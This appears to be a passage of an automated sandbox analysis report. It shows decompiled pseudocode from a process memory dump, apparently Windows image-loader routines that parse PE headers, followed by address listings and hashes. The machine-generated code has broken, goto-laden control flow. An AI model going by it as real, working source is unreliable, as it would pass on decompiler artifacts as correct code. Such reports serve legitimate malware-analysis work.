                                                              													_t353 = _t24;
                                                              													_v176 = _t353;
                                                              													__eflags = _t340[3] - 0xffffffff;
                                                              													if(_t340[3] != 0xffffffff) {
                                                              														_t279 =  *_t340;
                                                              														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                              														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                              															asm("lock inc dword [edi+0x9c]");
                                                              															_t340 =  *(_t353 + 0x50);
                                                              														}
                                                              													}
                                                              													_v184 = _t340[8];
                                                              												}
                                                              											} else {
                                                              												_t339 =  *(_t277 + 4);
                                                              												if(_t351 != 0) {
                                                              													__eflags = _t339;
                                                              													if(_t339 == 0) {
                                                              														goto L16;
                                                              													} else {
                                                              														L118:
                                                              														_t277 = _t277 ^ _t339;
                                                              														goto L17;
                                                              													}
                                                              													goto L151;
                                                              												} else {
                                                              													L16:
                                                              													_t277 = _t339;
                                                              												}
                                                              												goto L17;
                                                              											}
                                                              										}
                                                              										goto L25;
                                                              										L17:
                                                              									}
                                                              									L25:
                                                              									E00FFFFB0(_t287, _t353, 0x10d84d8);
                                                              									_t320 = _v184;
                                                              									_t342 = 0x1000;
                                                              								}
                                                              								if(_t353 == 0) {
                                                              									break;
                                                              								} else {
                                                              									_t366 = 0;
                                                              									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                              										_t288 = _v164;
                                                              										if(_t353 != 0) {
                                                              											_t342 = _t288;
                                                              											_t374 = E0103CC99(_t353, _t288, _v200, 1,  &_v168);
                                                              											if(_t374 >= 0) {
                                                              												if(_v184 == 7) {
                                                              													__eflags = _a20;
                                                              													if(__eflags == 0) {
                                                              														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                              														if(__eflags != 0) {
                                                              															_t271 = E00FF6600(0x10d52d8);
                                                              															__eflags = _t271;
                                                              															if(__eflags == 0) {
                                                              																_t342 = 0;
                                                              																_v169 = _t271;
                                                              																_t374 = E00FF7926( *(_t353 + 0x50), 0,  &_v169);
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              												if(_t374 < 0) {
                                                              													_v168 = 0;
                                                              												} else {
                                                              													if( *0x10db239 != 0) {
                                                              														_t342 =  *(_t353 + 0x18);
                                                              														E0106E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                              													}
                                                              													if( *0x10d8472 != 0) {
                                                              														_v192 = 0;
                                                              														_t342 =  *0x7ffe0330;
                                                              														asm("ror edi, cl");
                                                              														 *0x10db1e0( &_v192, _t353, _v168, 0, _v180);
                                                              														 *( *0x10db218 ^  *0x7ffe0330)();
                                                              														_t269 = _v192;
                                                              														_t353 = _v176;
                                                              														__eflags = _t269;
                                                              														if(__eflags != 0) {
                                                              															_v168 = _t269;
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                              												_t366 = 0xc000007a;
                                                              											}
                                                              											_t247 =  *(_t353 + 0x50);
                                                              											if(_t247[3] == 0xffffffff) {
                                                              												L40:
                                                              												if(_t366 == 0xc000007a) {
                                                              													__eflags = _t288;
                                                              													if(_t288 == 0) {
                                                              														goto L136;
                                                              													} else {
                                                              														_t366 = 0xc0000139;
                                                              													}
                                                              													goto L54;
                                                              												}
                                                              											} else {
                                                              												_t249 =  *_t247;
                                                              												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                              													goto L40;
                                                              												} else {
                                                              													_t250 = _t249 | 0xffffffff;
                                                              													asm("lock xadd [edi+0x9c], eax");
                                                              													if((_t249 | 0xffffffff) == 0) {
                                                              														E01002280(_t250, 0x10d84d8);
                                                              														_t342 =  *(_t353 + 0x54);
                                                              														_t165 = _t353 + 0x54; // 0x54
                                                              														_t252 = _t165;
                                                              														__eflags =  *(_t342 + 4) - _t252;
                                                              														if( *(_t342 + 4) != _t252) {
                                                              															L135:
                                                              															asm("int 0x29");
                                                              															L136:
                                                              															_t288 = _v200;
                                                              															_t366 = 0xc0000138;
                                                              															L54:
                                                              															_t342 = _t288;
                                                              															L01023898(0, _t288, _t366);
                                                              														} else {
                                                              															_t324 =  *(_t252 + 4);
                                                              															__eflags =  *_t324 - _t252;
                                                              															if( *_t324 != _t252) {
                                                              																goto L135;
                                                              															} else {
                                                              																 *_t324 = _t342;
                                                              																 *(_t342 + 4) = _t324;
                                                              																_t293 =  *(_t353 + 0x50);
                                                              																_v180 =  *_t293;
                                                              																E00FFFFB0(_t293, _t353, 0x10d84d8);
                                                              																__eflags =  *((short*)(_t353 + 0x3a));
                                                              																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                              																	_t342 = 0;
                                                              																	__eflags = 0;
                                                              																	E010237F5(_t353, 0);
                                                              																}
                                                              																E01020413(_t353);
                                                              																_t256 =  *(_t353 + 0x48);
                                                              																__eflags = _t256;
                                                              																if(_t256 != 0) {
                                                              																	__eflags = _t256 - 0xffffffff;
                                                              																	if(_t256 != 0xffffffff) {
                                                              																		E01019B10(_t256);
                                                              																	}
                                                              																}
                                                              																__eflags =  *(_t353 + 0x28);
                                                              																if( *(_t353 + 0x28) != 0) {
                                                              																	_t174 = _t353 + 0x24; // 0x24
                                                              																	E010102D6(_t174);
                                                              																}
                                                              																L010077F0( *0x10d7b98, 0, _t353);
                                                              																__eflags = _v180 - _t293;
                                                              																if(__eflags == 0) {
                                                              																	E0101C277(_t293, _t366);
                                                              																}
                                                              																_t288 = _v164;
                                                              																goto L40;
                                                              															}
                                                              														}
                                                              													} else {
                                                              														goto L40;
                                                              													}
                                                              												}
                                                              											}
                                                              										}
                                                              									} else {
                                                              										L00FFEC7F(_t353);
                                                              										L010119B8(_t287, 0, _t353, 0);
                                                              										_t200 = E00FEF4E3(__eflags);
                                                              										continue;
                                                              									}
                                                              								}
                                                              								L41:
                                                              								if(_v157 != 0) {
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                              								}
                                                              								if(_t366 < 0 || ( *0x10db2f8 |  *0x10db2fc) == 0 || ( *0x10db2e4 & 0x00000001) != 0) {
                                                              									L46:
                                                              									 *_v212 = _v168;
                                                              									_t204 = _t366;
                                                              									L47:
                                                              									_pop(_t354);
                                                              									_pop(_t367);
                                                              									_pop(_t289);
                                                              									return E0102B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                              								} else {
                                                              									_v200 = 0;
                                                              									if(( *0x10db2ec >> 0x00000008 & 0x00000003) == 3) {
                                                              										_t355 = _v168;
                                                              										_t342 =  &_v208;
                                                              										_t208 = E01096B68(_v168,  &_v208, _v168, __eflags);
                                                              										__eflags = _t208 - 1;
                                                              										if(_t208 == 1) {
                                                              											goto L46;
                                                              										} else {
                                                              											__eflags = _v208 & 0x00000010;
                                                              											if((_v208 & 0x00000010) == 0) {
                                                              												goto L46;
                                                              											} else {
                                                              												_t342 = 4;
                                                              												_t366 = E01096AEB(_t355, 4,  &_v216);
                                                              												__eflags = _t366;
                                                              												if(_t366 >= 0) {
                                                              													goto L46;
                                                              												} else {
                                                              													asm("int 0x29");
                                                              													_t356 = 0;
                                                              													_v44 = 0;
                                                              													_t290 = _v52;
                                                              													__eflags = 0;
                                                              													if(0 == 0) {
                                                              														L108:
                                                              														_t356 = 0;
                                                              														_v44 = 0;
                                                              														goto L63;
                                                              													} else {
                                                              														__eflags = 0;
                                                              														if(0 < 0) {
                                                              															goto L108;
                                                              														}
                                                              														L63:
                                                              														_v112 = _t356;
                                                              														__eflags = _t356;
                                                              														if(_t356 == 0) {
                                                              															L143:
                                                              															_v8 = 0xfffffffe;
                                                              															_t211 = 0xc0000089;
                                                              														} else {
                                                              															_v36 = 0;
                                                              															_v60 = 0;
                                                              															_v48 = 0;
                                                              															_v68 = 0;
                                                              															_v44 = _t290 & 0xfffffffc;
                                                              															E00FFE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                              															_t306 = _v68;
                                                              															__eflags = _t306;
                                                              															if(_t306 == 0) {
                                                              																_t216 = 0xc000007b;
                                                              																_v36 = 0xc000007b;
                                                              																_t307 = _v60;
                                                              															} else {
                                                              																__eflags = _t290 & 0x00000001;
                                                              																if(__eflags == 0) {
                                                              																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                              																	__eflags = _t349 - 0x10b;
                                                              																	if(_t349 != 0x10b) {
                                                              																		__eflags = _t349 - 0x20b;
                                                              																		if(_t349 == 0x20b) {
                                                              																			goto L102;
                                                              																		} else {
                                                              																			_t307 = 0;
                                                              																			_v48 = 0;
                                                              																			_t216 = 0xc000007b;
                                                              																			_v36 = 0xc000007b;
                                                              																			goto L71;
                                                              																		}
                                                              																	} else {
                                                              																		L102:
                                                              																		_t307 =  *(_t306 + 0x50);
                                                              																		goto L69;
                                                              																	}
                                                              																	goto L151;
                                                              																} else {
                                                              																	_t239 = L00FFEAEA(_t290, _t290, _t356, _t366, __eflags);
                                                              																	_t307 = _t239;
                                                              																	_v60 = _t307;
                                                              																	_v48 = _t307;
                                                              																	__eflags = _t307;
                                                              																	if(_t307 != 0) {
                                                              																		L70:
                                                              																		_t216 = _v36;
                                                              																	} else {
                                                              																		_push(_t239);
                                                              																		_push(0x14);
                                                              																		_push( &_v144);
                                                              																		_push(3);
                                                              																		_push(_v44);
                                                              																		_push(0xffffffff);
                                                              																		_t319 = E01029730();
                                                              																		_v36 = _t319;
                                                              																		__eflags = _t319;
                                                              																		if(_t319 < 0) {
                                                              																			_t216 = 0xc000001f;
                                                              																			_v36 = 0xc000001f;
                                                              																			_t307 = _v60;
                                                              																		} else {
                                                              																			_t307 = _v132;
                                                              																			L69:
                                                              																			_v48 = _t307;
                                                              																			goto L70;
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              															L71:
                                                              															_v72 = _t307;
                                                              															_v84 = _t216;
                                                              															__eflags = _t216 - 0xc000007b;
                                                              															if(_t216 == 0xc000007b) {
                                                              																L150:
                                                              																_v8 = 0xfffffffe;
                                                              																_t211 = 0xc000007b;
                                                              															} else {
                                                              																_t344 = _t290 & 0xfffffffc;
                                                              																_v76 = _t344;
                                                              																__eflags = _v40 - _t344;
                                                              																if(_v40 <= _t344) {
                                                              																	goto L150;
                                                              																} else {
                                                              																	__eflags = _t307;
                                                              																	if(_t307 == 0) {
                                                              																		L75:
                                                              																		_t217 = 0;
                                                              																		_v104 = 0;
                                                              																		__eflags = _t366;
                                                              																		if(_t366 != 0) {
                                                              																			__eflags = _t290 & 0x00000001;
                                                              																			if((_t290 & 0x00000001) != 0) {
                                                              																				_t217 = 1;
                                                              																				_v104 = 1;
                                                              																			}
                                                              																			_t290 = _v44;
                                                              																			_v52 = _t290;
                                                              																		}
                                                              																		__eflags = _t217 - 1;
                                                              																		if(_t217 != 1) {
                                                              																			_t369 = 0;
                                                              																			_t218 = _v40;
                                                              																			goto L91;
                                                              																		} else {
                                                              																			_v64 = 0;
                                                              																			E00FFE9C0(1, _t290, 0, 0,  &_v64);
                                                              																			_t309 = _v64;
                                                              																			_v108 = _t309;
                                                              																			__eflags = _t309;
                                                              																			if(_t309 == 0) {
                                                              																				goto L143;
                                                              																			} else {
                                                              																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                              																				__eflags = _t226 - 0x10b;
                                                              																				if(_t226 != 0x10b) {
                                                              																					__eflags = _t226 - 0x20b;
                                                              																					if(_t226 != 0x20b) {
                                                              																						goto L143;
                                                              																					} else {
                                                              																						_t371 =  *(_t309 + 0x98);
                                                              																						goto L83;
                                                              																					}
                                                              																				} else {
                                                              																					_t371 =  *(_t309 + 0x88);
                                                              																					L83:
                                                              																					__eflags = _t371;
                                                              																					if(_t371 != 0) {
                                                              																						_v80 = _t371 - _t356 + _t290;
                                                              																						_t310 = _v64;
                                                              																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                              																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                              																						_t311 = 0;
                                                              																						__eflags = 0;
                                                              																						while(1) {
                                                              																							_v120 = _t311;
                                                              																							_v116 = _t348;
                                                              																							__eflags = _t311 - _t292;
                                                              																							if(_t311 >= _t292) {
                                                              																								goto L143;
                                                              																							}
                                                              																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                              																							__eflags = _t371 - _t359;
                                                              																							if(_t371 < _t359) {
                                                              																								L98:
                                                              																								_t348 = _t348 + 0x28;
                                                              																								_t311 = _t311 + 1;
                                                              																								continue;
                                                              																							} else {
                                                              																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                              																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                              																									goto L98;
                                                              																								} else {
                                                              																									__eflags = _t348;
                                                              																									if(_t348 == 0) {
                                                              																										goto L143;
                                                              																									} else {
                                                              																										_t218 = _v40;
                                                              																										_t312 =  *_t218;
                                                              																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                              																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                              																											_v100 = _t359;
                                                              																											_t360 = _v108;
                                                              																											_t372 = L00FF8F44(_v108, _t312);
                                                              																											__eflags = _t372;
                                                              																											if(_t372 == 0) {
                                                              																												goto L143;
                                                              																											} else {
                                                              																												_t290 = _v52;
                                                              																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01023C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                              																												_t307 = _v72;
                                                              																												_t344 = _v76;
                                                              																												_t218 = _v40;
                                                              																												goto L91;
                                                              																											}
                                                              																										} else {
                                                              																											_t290 = _v52;
                                                              																											_t307 = _v72;
                                                              																											_t344 = _v76;
                                                              																											_t369 = _v80;
                                                              																											L91:
                                                              																											_t358 = _a4;
                                                              																											__eflags = _t358;
                                                              																											if(_t358 == 0) {
                                                              																												L95:
                                                              																												_t308 = _a8;
                                                              																												__eflags = _t308;
                                                              																												if(_t308 != 0) {
                                                              																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                              																												}
                                                              																												_v8 = 0xfffffffe;
                                                              																												_t211 = _v84;
                                                              																											} else {
                                                              																												_t370 =  *_t218 - _t369 + _t290;
                                                              																												 *_t358 = _t370;
                                                              																												__eflags = _t370 - _t344;
                                                              																												if(_t370 <= _t344) {
                                                              																													L149:
                                                              																													 *_t358 = 0;
                                                              																													goto L150;
                                                              																												} else {
                                                              																													__eflags = _t307;
                                                              																													if(_t307 == 0) {
                                                              																														goto L95;
                                                              																													} else {
                                                              																														__eflags = _t370 - _t344 + _t307;
                                                              																														if(_t370 >= _t344 + _t307) {
                                                              																															goto L149;
                                                              																														} else {
                                                              																															goto L95;
                                                              																														}
                                                              																													}
                                                              																												}
                                                              																											}
                                                              																										}
                                                              																									}
                                                              																								}
                                                              																							}
                                                              																							goto L97;
                                                              																						}
                                                              																					}
                                                              																					goto L143;
                                                              																				}
                                                              																			}
                                                              																		}
                                                              																	} else {
                                                              																		__eflags = _v40 - _t307 + _t344;
                                                              																		if(_v40 >= _t307 + _t344) {
                                                              																			goto L150;
                                                              																		} else {
                                                              																			goto L75;
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              														}
                                                              														L97:
                                                              														 *[fs:0x0] = _v20;
                                                              														return _t211;
                                                              													}
                                                              												}
                                                              											}
                                                              										}
                                                              									} else {
                                                              										goto L46;
                                                              									}
                                                              								}
                                                              								goto L151;
                                                              							}
                                                              							_t288 = _v164;
                                                              							_t366 = 0xc0000135;
                                                              							goto L41;
                                                              						}
                                                              					}
                                                              				}
                                                              				L151:
                                                              			}

                                                              0x00ffd791
                                                              0x00ffd798
                                                              0x0104b3a3
                                                              0x0104b3bb
                                                              0x0104b3bb
                                                              0x00ffd7a5
                                                              0x00ffd866
                                                              0x00ffd870
                                                              0x00ffd892
                                                              0x00ffd898
                                                              0x00ffd89e
                                                              0x00ffd8a0
                                                              0x00ffd8a6
                                                              0x00ffd8ac
                                                              0x00ffd8ae
                                                              0x00ffd8b4
                                                              0x00ffd8b4
                                                              0x00ffd8ae
                                                              0x00ffd7a5
                                                              0x00ffd78b
                                                              0x00ffd7b1
                                                              0x0104b3c5
                                                              0x0104b3c5
                                                              0x00ffd7c3
                                                              0x00ffd7ca
                                                              0x00ffd7e5
                                                              0x00ffd7eb
                                                              0x00ffd8eb
                                                              0x00ffd8ed
                                                              0x00000000
                                                              0x00ffd8f3
                                                              0x00ffd8f3
                                                              0x00ffd8f3
                                                              0x00000000
                                                              0x00ffd8ed
                                                              0x00ffd7cc
                                                              0x00ffd7cc
                                                              0x00ffd7d2
                                                              0x00000000
                                                              0x00ffd7d4
                                                              0x00ffd7d4
                                                              0x00ffd7d7
                                                              0x00ffd7df
                                                              0x0104b3d4
                                                              0x0104b3d9
                                                              0x0104b3dc
                                                              0x0104b3dc
                                                              0x0104b3df
                                                              0x0104b3e2
                                                              0x0104b468
                                                              0x0104b46d
                                                              0x0104b46f
                                                              0x0104b46f
                                                              0x0104b475
                                                              0x00ffd8f8
                                                              0x00ffd8f9
                                                              0x00ffd8fd
                                                              0x0104b3e8
                                                              0x0104b3e8
                                                              0x0104b3eb
                                                              0x0104b3ed
                                                              0x00000000
                                                              0x0104b3ef
                                                              0x0104b3ef
                                                              0x0104b3f1
                                                              0x0104b3f4
                                                              0x0104b3fe
                                                              0x0104b404
                                                              0x0104b409
                                                              0x0104b40e
                                                              0x0104b410
                                                              0x0104b410
                                                              0x0104b414
                                                              0x0104b414
                                                              0x0104b41b
                                                              0x0104b420
                                                              0x0104b423
                                                              0x0104b425
                                                              0x0104b427
                                                              0x0104b42a
                                                              0x0104b42d
                                                              0x0104b42d
                                                              0x0104b42a
                                                              0x0104b432
                                                              0x0104b436
                                                              0x0104b438
                                                              0x0104b43b
                                                              0x0104b43b
                                                              0x0104b449
                                                              0x0104b44e
                                                              0x0104b454
                                                              0x0104b458
                                                              0x0104b458
                                                              0x0104b45d
                                                              0x00000000
                                                              0x0104b45d
                                                              0x0104b3ed
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ffd7df
                                                              0x00ffd7d2
                                                              0x00ffd7ca
                                                              0x0104b37c
                                                              0x0104b37e
                                                              0x0104b385
                                                              0x0104b38a
                                                              0x00000000
                                                              0x0104b38a
                                                              0x00ffd742
                                                              0x00ffd7f1
                                                              0x00ffd7f8
                                                              0x0104b49b
                                                              0x0104b49b
                                                              0x00ffd800
                                                              0x00ffd837
                                                              0x00ffd843
                                                              0x00ffd845
                                                              0x00ffd847
                                                              0x00ffd84a
                                                              0x00ffd84b
                                                              0x00ffd84e
                                                              0x00ffd857
                                                              0x00ffd818
                                                              0x00ffd824
                                                              0x00ffd831
                                                              0x0104b4a5
                                                              0x0104b4ab
                                                              0x0104b4b3
                                                              0x0104b4b8
                                                              0x0104b4bb
                                                              0x00000000
                                                              0x0104b4c1
                                                              0x0104b4c1
                                                              0x0104b4c8
                                                              0x00000000
                                                              0x0104b4ce
                                                              0x0104b4d4
                                                              0x0104b4e1
                                                              0x0104b4e3
                                                              0x0104b4e5
                                                              0x00000000
                                                              0x0104b4eb
                                                              0x0104b4f0
                                                              0x0104b4f2
                                                              0x00ffdac9
                                                              0x00ffdacc
                                                              0x00ffdacf
                                                              0x00ffdad1
                                                              0x00ffdd78
                                                              0x00ffdd78
                                                              0x00ffdcf2
                                                              0x00000000
                                                              0x00ffdad7
                                                              0x00ffdad9
                                                              0x00ffdadb
                                                              0x00000000
                                                              0x00000000
                                                              0x00ffdae1
                                                              0x00ffdae1
                                                              0x00ffdae4
                                                              0x00ffdae6
                                                              0x0104b4f9
                                                              0x0104b4f9
                                                              0x0104b500
                                                              0x00ffdaec
                                                              0x00ffdaec
                                                              0x00ffdaf5
                                                              0x00ffdaf8
                                                              0x00ffdafb
                                                              0x00ffdb03
                                                              0x00ffdb11
                                                              0x00ffdb16
                                                              0x00ffdb19
                                                              0x00ffdb1b
                                                              0x0104b52c
                                                              0x0104b531
                                                              0x0104b534
                                                              0x00ffdb21
                                                              0x00ffdb21
                                                              0x00ffdb24
                                                              0x00ffdcd9
                                                              0x00ffdce2
                                                              0x00ffdce5
                                                              0x00ffdd6a
                                                              0x00ffdd6d
                                                              0x00000000
                                                              0x00ffdd73
                                                              0x0104b51a
                                                              0x0104b51c
                                                              0x0104b51f
                                                              0x0104b524
                                                              0x00000000
                                                              0x0104b524
                                                              0x00ffdce7
                                                              0x00ffdce7
                                                              0x00ffdce7
                                                              0x00000000
                                                              0x00ffdce7
                                                              0x00000000
                                                              0x00ffdb2a
                                                              0x00ffdb2c
                                                              0x00ffdb31
                                                              0x00ffdb33
                                                              0x00ffdb36
                                                              0x00ffdb39
                                                              0x00ffdb3b
                                                              0x00ffdb66
                                                              0x00ffdb66
                                                              0x00ffdb3d
                                                              0x00ffdb3d
                                                              0x00ffdb3e
                                                              0x00ffdb46
                                                              0x00ffdb47
                                                              0x00ffdb49
                                                              0x00ffdb4c
                                                              0x00ffdb53
                                                              0x00ffdb55
                                                              0x00ffdb58
                                                              0x00ffdb5a
                                                              0x0104b50a
                                                              0x0104b50f
                                                              0x0104b512
                                                              0x00ffdb60
                                                              0x00ffdb60
                                                              0x00ffdb63
                                                              0x00ffdb63
                                                              0x00000000
                                                              0x00ffdb63
                                                              0x00ffdb5a
                                                              0x00ffdb3b
                                                              0x00ffdb24
                                                              0x00ffdb69
                                                              0x00ffdb69
                                                              0x00ffdb6c
                                                              0x00ffdb6f
                                                              0x00ffdb74
                                                              0x0104b557
                                                              0x0104b557
                                                              0x0104b55e
                                                              0x00ffdb7a
                                                              0x00ffdb7c
                                                              0x00ffdb7f
                                                              0x00ffdb82
                                                              0x00ffdb85
                                                              0x00000000
                                                              0x00ffdb8b
                                                              0x00ffdb8b
                                                              0x00ffdb8d
                                                              0x00ffdb9b
                                                              0x00ffdb9b
                                                              0x00ffdb9d
                                                              0x00ffdba0
                                                              0x00ffdba2
                                                              0x00ffdba4
                                                              0x00ffdba7
                                                              0x00ffdba9
                                                              0x00ffdbae
                                                              0x00ffdbae
                                                              0x00ffdbb1
                                                              0x00ffdbb4
                                                              0x00ffdbb4
                                                              0x00ffdbb7
                                                              0x00ffdbba
                                                              0x00ffdcd2
                                                              0x00ffdcd4
                                                              0x00000000
                                                              0x00ffdbc0
                                                              0x00ffdbc0
                                                              0x00ffdbd2
                                                              0x00ffdbd7
                                                              0x00ffdbda
                                                              0x00ffdbdd
                                                              0x00ffdbdf
                                                              0x00000000
                                                              0x00ffdbe5
                                                              0x00ffdbe5
                                                              0x00ffdbee
                                                              0x00ffdbf1
                                                              0x0104b541
                                                              0x0104b544
                                                              0x00000000
                                                              0x0104b546
                                                              0x0104b546
                                                              0x00000000
                                                              0x0104b546
                                                              0x00ffdbf7
                                                              0x00ffdbf7
                                                              0x00ffdbfd
                                                              0x00ffdbfd
                                                              0x00ffdbff
                                                              0x00ffdc0b
                                                              0x00ffdc15
                                                              0x00ffdc1b
                                                              0x00ffdc1d
                                                              0x00ffdc21
                                                              0x00ffdc21
                                                              0x00ffdc23
                                                              0x00ffdc23
                                                              0x00ffdc26
                                                              0x00ffdc29
                                                              0x00ffdc2b
                                                              0x00000000
                                                              0x00000000
                                                              0x00ffdc31
                                                              0x00ffdc34
                                                              0x00ffdc36
                                                              0x00ffdcbf
                                                              0x00ffdcbf
                                                              0x00ffdcc2
                                                              0x00000000
                                                              0x00ffdc3c
                                                              0x00ffdc41
                                                              0x00ffdc43
                                                              0x00000000
                                                              0x00ffdc45
                                                              0x00ffdc45
                                                              0x00ffdc47
                                                              0x00000000
                                                              0x00ffdc4d
                                                              0x00ffdc4d
                                                              0x00ffdc50
                                                              0x00ffdc52
                                                              0x00ffdc55
                                                              0x00ffdcfa
                                                              0x00ffdcfe
                                                              0x00ffdd08
                                                              0x00ffdd0a
                                                              0x00ffdd0c
                                                              0x00000000
                                                              0x00ffdd12
                                                              0x00ffdd15
                                                              0x00ffdd2d
                                                              0x00ffdd2f
                                                              0x00ffdd32
                                                              0x00ffdd35
                                                              0x00000000
                                                              0x00ffdd35
                                                              0x00ffdc5b
                                                              0x00ffdc5b
                                                              0x00ffdc5e
                                                              0x00ffdc61
                                                              0x00ffdc64
                                                              0x00ffdc67
                                                              0x00ffdc67
                                                              0x00ffdc6a
                                                              0x00ffdc6c
                                                              0x00ffdc8e
                                                              0x00ffdc8e
                                                              0x00ffdc91
                                                              0x00ffdc93
                                                              0x00ffdcce
                                                              0x00ffdcce
                                                              0x00ffdc95
                                                              0x00ffdc9c
                                                              0x00ffdc6e
                                                              0x00ffdc72
                                                              0x00ffdc75
                                                              0x00ffdc77
                                                              0x00ffdc79
                                                              0x0104b551
                                                              0x0104b551
                                                              0x00000000
                                                              0x00ffdc7f
                                                              0x00ffdc7f
                                                              0x00ffdc81
                                                              0x00000000
                                                              0x00ffdc83
                                                              0x00ffdc86
                                                              0x00ffdc88
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ffdc88
                                                              0x00ffdc81
                                                              0x00ffdc79
                                                              0x00ffdc6c
                                                              0x00ffdc55
                                                              0x00ffdc47
                                                              0x00ffdc43
                                                              0x00000000
                                                              0x00ffdc36

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
                                                              • Instruction ID: 6fb51acb59f20522c2877c12fc0ce250e60e1bdc0cce265baeafb91d4780d94d
                                                              • Opcode Fuzzy Hash: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
                                                              • Instruction Fuzzy Hash: C8E1D271A013198FEB34DF29C880BB9B7B2BF85314F1441E9DA899B2A1DB34DD81DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E00FF849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                              				void* _t136;
                                                              				signed int _t139;
                                                              				signed int _t141;
                                                              				signed int _t145;
                                                              				intOrPtr _t146;
                                                              				signed int _t149;
                                                              				signed int _t150;
                                                              				signed int _t161;
                                                              				signed int _t163;
                                                              				signed int _t165;
                                                              				signed int _t169;
                                                              				signed int _t171;
                                                              				signed int _t194;
                                                              				signed int _t200;
                                                              				void* _t201;
                                                              				signed int _t204;
                                                              				signed int _t206;
                                                              				signed int _t210;
                                                              				signed int _t214;
                                                              				signed int _t215;
                                                              				signed int _t218;
                                                              				void* _t221;
                                                              				signed int _t224;
                                                              				signed int _t226;
                                                              				intOrPtr _t228;
                                                              				signed int _t232;
                                                              				signed int _t233;
                                                              				signed int _t234;
                                                              				void* _t237;
                                                              				void* _t238;
                                                              
                                                              				_t236 = __esi;
                                                              				_t235 = __edi;
                                                              				_t193 = __ebx;
                                                              				_push(0x70);
                                                              				_push(0x10bf9c0);
                                                              				E0103D0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                              				if( *0x10d7b04 == 0) {
                                                              					L4:
                                                              					goto L5;
                                                              				} else {
                                                              					_t136 = E00FFCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                              					_t236 = 0;
                                                              					if(_t136 < 0) {
                                                              						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                              					}
                                                              					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                              						_t193 =  *( *[fs:0x30] + 0x18);
                                                              						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                              						 *(_t237 - 0x68) = _t236;
                                                              						 *(_t237 - 0x6c) = _t236;
                                                              						_t235 = _t236;
                                                              						 *(_t237 - 0x60) = _t236;
                                                              						E01002280( *[fs:0x30], 0x10d8550);
                                                              						_t139 =  *0x10d7b04; // 0x1
                                                              						__eflags = _t139 - 1;
                                                              						if(__eflags != 0) {
                                                              							_t200 = 0xc;
                                                              							_t201 = _t237 - 0x40;
                                                              							_t141 = E0101F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                              							 *(_t237 - 0x44) = _t141;
                                                              							__eflags = _t141;
                                                              							if(_t141 < 0) {
                                                              								L50:
                                                              								E00FFFFB0(_t193, _t235, 0x10d8550);
                                                              								L5:
                                                              								return E0103D130(_t193, _t235, _t236);
                                                              							}
                                                              							_push(_t201);
                                                              							_t221 = 0x10;
                                                              							_t202 =  *(_t237 - 0x40);
                                                              							_t145 = E00FE1C45( *(_t237 - 0x40), _t221);
                                                              							 *(_t237 - 0x44) = _t145;
                                                              							__eflags = _t145;
                                                              							if(_t145 < 0) {
                                                              								goto L50;
                                                              							}
                                                              							_t146 =  *0x10d7b9c; // 0x0
                                                              							_t235 = L01004620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                              							 *(_t237 - 0x60) = _t235;
                                                              							__eflags = _t235;
                                                              							if(_t235 == 0) {
                                                              								_t149 = 0xc0000017;
                                                              								 *(_t237 - 0x44) = 0xc0000017;
                                                              							} else {
                                                              								_t149 =  *(_t237 - 0x44);
                                                              							}
                                                              							__eflags = _t149;
                                                              							if(__eflags >= 0) {
                                                              								L8:
                                                              								 *(_t237 - 0x64) = _t235;
                                                              								_t150 =  *0x10d7b10; // 0x0
                                                              								 *(_t237 - 0x4c) = _t150;
                                                              								_push(_t237 - 0x74);
                                                              								_push(_t237 - 0x39);
                                                              								_push(_t237 - 0x58);
